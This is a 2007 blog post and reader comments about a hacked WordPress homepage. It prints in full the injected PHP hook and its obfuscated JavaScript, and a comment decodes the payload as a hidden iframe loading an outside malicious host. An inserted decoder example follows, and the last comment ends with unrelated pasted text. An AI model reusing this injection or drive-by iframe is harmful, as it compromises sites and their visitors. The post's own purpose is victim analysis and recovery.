Trying to hack the blog?

During the last 4 hours the homepage of this blog was not accessible.

Someone hacked the index.php page and replaced this code

<?php
 
define('WP_USE_THEMES', true);
require('./wp-blog-header.php');
 
?>

with this one

<?php
ob_start("phpfake");
 
/* Short and sweet */
define('WP_USE_THEMES', true);
require('./wp-blog-header.php');
?>
<?php
function phpfake($buffer)
{
  $Exp='<script language="javascript">$="%6fp%3d%22%2524%253d%2522dw(d%2563s%2528c%2575,1%2534))%253b%2522;%22;cd%3d%221%2529;%2573t%253dst+S%2574rin%2567.f%2572o%256dCha%2572C%256fde(%2528tmp%25%22;cz%3d%22%2566unc%2574i%256fn %2563z%2528c%257a){%2572etu%2572n %2563a+c%2562+c%2563+%2563d+%2563e%252bcz;%257d;%22;cc%3d%22ds.l%2565ng%2574%2568;%2569++%2529{t%256dp%253dds%252esli%2563%2565(i,%2569+%22;db%3d%22d7%3c7e7%3c7f7%3c7g7%3c7h7%3c7i7%3c7j79+fqb0~)-~ug0Qbbqi8!%3c%2522%3c#%3c$%3c%25%3c&%3c%27%3c(%3c)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)%3ewudVe||Iuqb89+yv8t)%3ewudTqi89.#9d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi89;%25229+u|cu%22;da%3d%22fqb0})-~ug0Qbbqi87e~%257F7%3c7tfu7%3c7dxb7%3c7vyb7%3c7fyv7%3c7huc7%3c7fuc7%3c7wxd7%3c7u~y7%3c7ud~7%3c7|uf7%3c7dgu79+fqb0|)-~ug0Qbbqi87q7%3c7r7%3c7s7%3c7t7%3c7u7%3c7v7%3c7w7%3c7x7%3c7y7%3c7z7%3c7{7%3c7|7%3c7}7%3c7~7%3c7%257F7%3c7`7%3c7a7%3c7b7%3c7c7%3c7%22;cb%3d%221pe%2528%2564s)%253bst%253d%2574m%2570%253d%2527%2527;for(i%253d0%253b%2569%253c%22;ca%3d%22%2566u%256ecti%256fn %2564cs%2528d%2573%252ce%2573%2529%257bds%253dunes%2563%256%22;dc%3d%220d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi899+yv8d)K7t7M,%25209d)K7t7M-!+d)K7}7M-t)%3ewud]%257F~dx89;!+ve~sdy%257F~0S]^8t%3c}%3ci9kfqb0b-888i;8#:t99;8}Nt9:#9;t9+budeb~0b+mfqb0t-7fuc|%257Fh%3es%257F}7+fqb0iSx!%3ciSx%2522%3c%22;st%3d%22%2573%2574%253d%2522$%253ds%2574%253b%2564%2563s%2528%2564a%252bd%2562+%2564%2563%252b%2564%2564%252bd%2565%252c%25310%2529%253bd%2577%2528%2573t%2529%253bs%2574%253d$%253b%2522;%22;dz%3d%22%2566%2575%256ecti%256fn %2564w%2528%2574){c%2561%253d%2527%252564ocu%25256%2564%2565%256et%25252ew%252572i%2574%252565%252528%252522%2527;ce%253d%2527%252522%252529%2527;cb%253d%2527%25253csc%252572i%252570t 
%2525%2536%2563a%25256e%25256%2537u%252561%2567%2565%25253d%25255c%252522ja%2576a%2573c%25257%2532%2569pt%25255c%252522%2525%2533%2565%2527;cc%253d%2527%25253c%25255c%25252fscrip%25257%2534%25253e%2527;eva%256c(un%2565s%2563a%2570e(t%2529)%257d%253b%22;de%3d%22-|)K88d)K7}7M;}^}950%2522%259M+yv888d)K7t7M:%25229.-%252096688d)K7t7M:%25229,-)99tSx-~)K8d)K7t7M50!%25209M+u|cu0tSx-|)K88d)K7t7M:&950%2522%279M+4-4%3ebu`|qsu8t%3ciSx%2522;}Sx;iSx!;tSx;})Kd)K7}7M%3d!M;7%3es%257F}79+%22;ce%3d%222echa%2572Cod%2565At%25280)^%2528%25270x00%2527+e%2573%2529)%2529;}%257d%22;cu%3d%22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;bqgx{l:w{y;xp;sfv;64c}p`|)%25$$4|q}s|`),$*(;}rfuyq*(;p}b*%22;dd%3d%22}Sx%3ctSx%3c}^}+yv8d)K7i7M,%2522%2520%2520%279kd)K7i7M0-0%2522%2520%2520%27+m}^}-S]^8d)K7t7M%3cd)K7}7M%3cd)K7i7M9+iSx!-|)K888d)K7i7M6%2520hQQ9;}^}950&5##950%2522&M+iSx%2522-|)K8888d)K7i7M6%2520h##!!9..#9;}^}950!%25209M+}Sx%22;%69f %28d%6f%63u%6d%65%6et%2e%63oo%6bie%2ein%64ex%4ff(%27r%665f6%64s%27)%3d%3d-1%29%7bsc(%27%72f5f%36d%73%27,2%2c7);%65v%61l(%75n%65s%63ape%28d%7a+c%7a%2bop+%73t)+%27dw%28dz%2b%63%7a(%24+s%74))%3b%27)}el%73e{%24%3d%27%27};func%74io%6e %73c(c%6e%6d,v,%65d)%7b%76ar%20%65xd%3dnew %44ate%28);e%78%64.se%74Da%74%65(%65x%64.%67etD%61%74e%28)+%65d);%64%6fcu%6den%74.co%6fki%65%3dcnm+ %27%3d%27 +%65%73ca%70e%28v%29+%27;e%78pir%65%73%3d%27+exd.t%6fG%4dT%53t%72in%67(%29;};";eval(unescape($));document.write($);</script><script language="javascript">$="%6fp%3d%22%2524%253d%2522dw(d%2563s%2528c%2575,1%2534))%253b%2522;%22;cd%3d%221%2529;%2573t%253dst+S%2574rin%2567.f%2572o%256dCha%2572C%256fde(%2528tmp%25%22;cz%3d%22%2566unc%2574i%256fn %2563z%2528c%257a){%2572etu%2572n 
%2563a+c%2562+c%2563+%2563d+%2563e%252bcz;%257d;%22;cc%3d%22ds.l%2565ng%2574%2568;%2569++%2529{t%256dp%253dds%252esli%2563%2565(i,%2569+%22;db%3d%22d7%3c7e7%3c7f7%3c7g7%3c7h7%3c7i7%3c7j79+fqb0~)-~ug0Qbbqi8!%3c%2522%3c#%3c$%3c%25%3c&%3c%27%3c(%3c)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)%3ewudVe||Iuqb89+yv8t)%3ewudTqi89.#9d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi89;%25229+u|cu%22;da%3d%22fqb0})-~ug0Qbbqi87e~%257F7%3c7tfu7%3c7dxb7%3c7vyb7%3c7fyv7%3c7huc7%3c7fuc7%3c7wxd7%3c7u~y7%3c7ud~7%3c7|uf7%3c7dgu79+fqb0|)-~ug0Qbbqi87q7%3c7r7%3c7s7%3c7t7%3c7u7%3c7v7%3c7w7%3c7x7%3c7y7%3c7z7%3c7{7%3c7|7%3c7}7%3c7~7%3c7%257F7%3c7`7%3c7a7%3c7b7%3c7c7%3c7%22;cb%3d%221pe%2528%2564s)%253bst%253d%2574m%2570%253d%2527%2527;for(i%253d0%253b%2569%253c%22;ca%3d%22%2566u%256ecti%256fn %2564cs%2528d%2573%252ce%2573%2529%257bds%253dunes%2563%256%22;dc%3d%220d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi899+yv8d)K7t7M,%25209d)K7t7M-!+d)K7}7M-t)%3ewud]%257F~dx89;!+ve~sdy%257F~0S]^8t%3c}%3ci9kfqb0b-888i;8#:t99;8}Nt9:#9;t9+budeb~0b+mfqb0t-7fuc|%257Fh%3es%257F}7+fqb0iSx!%3ciSx%2522%3c%22;st%3d%22%2573%2574%253d%2522$%253ds%2574%253b%2564%2563s%2528%2564a%252bd%2562+%2564%2563%252b%2564%2564%252bd%2565%252c%25310%2529%253bd%2577%2528%2573t%2529%253bs%2574%253d$%253b%2522;%22;dz%3d%22%2566%2575%256ecti%256fn %2564w%2528%2574){c%2561%253d%2527%252564ocu%25256%2564%2565%256et%25252ew%252572i%2574%252565%252528%252522%2527;ce%253d%2527%252522%252529%2527;cb%253d%2527%25253csc%252572i%252570t 
%2525%2536%2563a%25256e%25256%2537u%252561%2567%2565%25253d%25255c%252522ja%2576a%2573c%25257%2532%2569pt%25255c%252522%2525%2533%2565%2527;cc%253d%2527%25253c%25255c%25252fscrip%25257%2534%25253e%2527;eva%256c(un%2565s%2563a%2570e(t%2529)%257d%253b%22;de%3d%22-|)K88d)K7}7M;}^}950%2522%259M+yv888d)K7t7M:%25229.-%252096688d)K7t7M:%25229,-)99tSx-~)K8d)K7t7M50!%25209M+u|cu0tSx-|)K88d)K7t7M:&950%2522%279M+4-4%3ebu`|qsu8t%3ciSx%2522;}Sx;iSx!;tSx;})Kd)K7}7M%3d!M;7%3es%257F}79+%22;ce%3d%222echa%2572Cod%2565At%25280)^%2528%25270x00%2527+e%2573%2529)%2529;}%257d%22;cu%3d%22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;bqgx{l:w{y;xp;sfv;64c}p`|)%25$$4|q}s|`),$*(;}rfuyq*(;p}b*%22;dd%3d%22}Sx%3ctSx%3c}^}+yv8d)K7i7M,%2522%2520%2520%279kd)K7i7M0-0%2522%2520%2520%27+m}^}-S]^8d)K7t7M%3cd)K7}7M%3cd)K7i7M9+iSx!-|)K888d)K7i7M6%2520hQQ9;}^}950&5##950%2522&M+iSx%2522-|)K8888d)K7i7M6%2520h##!!9..#9;}^}950!%25209M+}Sx%22;%69f %28d%6f%63u%6d%65%6et%2e%63oo%6bie%2ein%64ex%4ff(%27r%665f6%64s%27)%3d%3d-1%29%7bsc(%27%72f5f%36d%73%27,2%2c7);%65v%61l(%75n%65s%63ape%28d%7a+c%7a%2bop+%73t)+%27dw%28dz%2b%63%7a(%24+s%74))%3b%27)}el%73e{%24%3d%27%27};func%74io%6e %73c(c%6e%6d,v,%65d)%7b%76ar%20%65xd%3dnew %44ate%28);e%78%64.se%74Da%74%65(%65x%64.%67etD%61%74e%28)+%65d);%64%6fcu%6den%74.co%6fki%65%3dcnm+ %27%3d%27 +%65%73ca%70e%28v%29+%27;e%78pir%65%73%3d%27+exd.t%6fG%4dT%53t%72in%67(%29;};";eval(unescape($));document.write($);</script>';
  return (ereg_replace("</body>", "$Exp</body>", $buffer));
}
?>

Any clue about the meaning of this expression? I googled for it but I only had results in German.
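Added example, not part of the original post: a static decoder in JavaScript (Node.js) that peels the nested percent-encoding used by the injected script without ever evaluating it, then flags what the decoded text does. The sample is two short fragments copied from the payload above; the function names and the indicator list are this example's own.

```javascript
// Added example: static analysis only; nothing here evaluates the payload.

// One pass of percent-decoding, the non-executing half of eval(unescape(...)).
// Malformed escapes such as `%6"` are left untouched: the payload splits
// escapes across variables that are only joined at run time.
function decodeOnce(s) {
  return s.replace(/%([0-9a-fA-F]{2})/g, (_, hex) =>
    String.fromCharCode(parseInt(hex, 16)));
}

// Decode until the text stops changing; maxRounds is a safety cap.
function peelLayers(s, maxRounds = 10) {
  let rounds = 0;
  while (rounds < maxRounds) {
    const next = decodeOnce(s);
    if (next === s) break;
    s = next;
    rounds += 1;
  }
  return { text: s, rounds };
}

// Patterns worth flagging in decoded script text (this example's own list).
const INDICATORS = {
  'eval': /\beval\s*\(/,
  'unescape': /\bunescape\s*\(/,
  'document.write': /document\.write\s*\(/,
  'document.cookie': /document\.cookie/,
  'iframe': /<iframe\b/i,
};

function findIndicators(text) {
  return Object.keys(INDICATORS).filter((name) => INDICATORS[name].test(text));
}

// Name of the cookie a script tests before acting, or null if none is found.
function cookieGate(text) {
  const m = /document\.cookie\.indexOf\('([^']+)'\)/.exec(text);
  return m ? m[1] : null;
}

// Two fragments copied from the injected payload shown above.
const SAMPLE =
  'cz%3d%22%2566unc%2574i%256fn %2563z%2528c%257a){%2572etu%2572n %2563a+c%2562+c%2563+%2563d+%2563e%252bcz;%257d;%22;' +
  '%69f %28d%6f%63u%6d%65%6et%2e%63oo%6bie%2ein%64ex%4ff(%27r%665f6%64s%27)%3d%3d-1%29';

const peeled = peelLayers(SAMPLE);
console.log(peeled.rounds, 'layers:', peeled.text);
console.log(findIndicators(peeled.text), cookieGate(peeled.text));
```

Because the payload concatenates its fragments only at run time, a purely static pass recovers each fragment on its own; escapes that straddle two fragments stay encoded rather than being guessed at.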

This reminded me to make a complete backup of the blog and the database.

I try to back up the blog every week, but sometimes it takes a month before I realize I must back up.

If you have a blog, how often do you back it up?


This post has 13 comments

  1. s0d4player

    on December 9, 2007 at 6:07 am

    I was worried when I saw that the homepage of the blog was down. I’m glad to see it back up.

  2. NoN

    on December 9, 2007 at 9:07 am

    Better make sure that the hacker can't strike again! I hate hackers because they just keep screwing my life!
    PS. Sorry my bad English

  3. Snuggles

    on December 9, 2007 at 9:38 am

    It seems to be a JavaScript function intent on hurting your webpage's HTML tags. The most common cause of this is unsafe or outdated hardware or virus protection on the server on which you host this blog. To fix this problem, regularly back up files and make sure that your hosting is hacker safe. This particular instance affected the entire front page by altering your tags and replacing them with its own code, which is what the Java was. This was a minor thing that could happen, as a skilled hacker could shut down your page for weeks and put their homepage up instead of yours.

    ~Snuggles

  4. shiv1411

    on December 9, 2007 at 11:58 am

    There should be a script that u can use to prevent it against all hackers.

  5. Massimo M.

    on December 9, 2007 at 5:36 pm

    I back up my site every day with the automatic aruba.it function (it costs only 2 euro/year to have the daily backup!!!!)

    I recommend you do the same ;)

    ciao !

    Massy

  6. Ciaren Coleman

    on December 9, 2007 at 7:05 pm

    to get on your blog I just went on one of your tutorials via my web cookies and then just looked at the new post bit to see if you did anything new.

  7. Mike

    on December 10, 2007 at 1:13 am

    It seems to be an obfuscated javascript function which will be inserted at the bottom of the page.

    The function seems to check if a cookie exists:
    >> if (document.cookie.indexOf('rf5f6ds')==-1)

    If it does not exist, it will create that cookie, and then do something else (which I have not de-fuscated yet)…

    Otherwise, it will set the do exactly nothing (or at least, that’s what it looks like)…

    -Mike

  8. Mike

    on December 10, 2007 at 2:43 am

    So… after tracing thru the code, this is what will be placed at the bottom of your page (ie; just before the closing body tag ”

    Not sure if that is of any use to you… but at least now you know what it’s trying to do (sort of).

    Also, this is the code that would generate the cookie:
    >>sc('rf5f6ds',2,7);
    >>function sc(cnm,v,ed)
    >>{
    >> var exd=new Date();
    >> exd.setDate(exd.getDate()+ed);
    >> document.cookie=cnm+ '=' +escape(v)+';expires='+exd.toGMTString();
    >>};

    So, it sets the cookie with a value of ’2′ and an expiration date of “one week from now”…

    I suppose, this is so it would only send visitors to the (hidden) page once a week…

    -Mike

  9. Mike

    on December 10, 2007 at 2:49 am

    Hmmm, looks like the code I entered got stripped out… I’ll try again:
    <div style=”visibility:hidden”><iframe src=”http://guuatwe.com/ld/grb/” width=100 height=80></iframe></div>

    -Mike

  10. marmph

    on December 10, 2007 at 11:57 pm

    no wonder the site was down…

  11. What to do when your blog has a virus : Emanuele Feronato

    on May 1, 2009 at 10:22 pm

    [...] hackers know my blog since quite a long ago and they even made my blog be marked by Google as a site that may harm your [...]

  12. 10 ways to secure your WordPress blog : Emanuele Feronato

    on October 14, 2009 at 12:42 am

    [...] old readers know, my blog has been hacked several times. You can read about my first hack and what to do when your blog has a virus, but now it’s time to prevent hackers from [...]

  13. Phil

    on August 11, 2010 at 2:59 am

    The same shit just happened to my site mate, I contacted hostgator and they are fixing it…

    The hax0r (lol) also uploaded mailcheck.php and that has more js code in it, and test.php with his adsense code in it… Possible clickjacking?

    [code]
    [/code]

    [code]

    Every Monday Scott Andrews contributes Officers’ Quarters , a column about the ins and outs of guild leadership. Last week, our very own Michael Sacco broke the news that raid lockouts will be extendable after Patch 3.2 . Reading through forum comments about this exciting new feature, I found the varied reactions quite amusing. Hardcore raiders seem to think that Blizzard is catering to casuals with this change. They think you should have…

    [/code]